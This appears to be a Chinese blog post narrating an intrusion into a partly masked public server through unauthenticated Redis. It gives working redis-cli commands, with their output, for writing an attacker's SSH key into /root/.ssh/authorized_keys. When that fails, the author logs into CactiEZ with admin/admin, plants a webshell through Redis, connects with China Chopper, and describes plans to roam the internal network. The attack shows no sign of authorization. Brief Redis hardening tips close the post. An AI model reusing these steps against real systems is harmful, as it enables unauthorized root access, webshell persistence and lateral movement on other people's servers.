您好,登錄后才能下訂單哦!
最近redis的話題比較多,因此就有了下面這個故事。
目標IP:210.73.90.xxx
利用漏洞:未授權的redis訪問
漏洞利用1:
1)本地生成秘鑰
root@GanDolf:~# ssh-keygen -t rsa
2)將公鑰寫入一個文件
root@GanDolf:~# cd /root/.ssh/
root@GanDolf:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
3)連接redis寫入文件root@GanDolf:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit
OK
root@GanDolf:~/.ssh# redis-cli -h 210.73.90.xxx
210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
saOK
(1.40s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@GanDolf:~/.ssh# ssh
4)連接服務器
root@GanDolf:~/.ssh# ssh -i id_rsa root@210.73.90.xxx
發現為開啟22端口
到此此方法失敗
漏洞利用2:
nmap掃描結果:
80 443 開放
訪問80原來是CactiEZ v10版本
嘗試弱口令登錄admin admin登錄成功,發現無長傳路徑。
嘗試redis寫webshell
前提:網站的物理路徑
手動幾次沒爆成功
轉向挖CactiEZ v10 的一些安裝信息
于是乎,下載CactiEZ v10 自己搭建虛擬安裝,啟動找出物理路徑為:
/var/www/html
于是利用redis寫shell
于是菜刀連起:
最后丟個小碼。看看能不能挖到啥東西,后續可以反彈到本地,內容漫游下(好多交換機,主機^__^)
最后總結關于redis的安全建議:
1)修改默認端口
2)監聽本地端口
3)使用非root啟動,否則出現漏洞1,直接拿到root權限
4)修改配置文件,禁用相關命令
# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。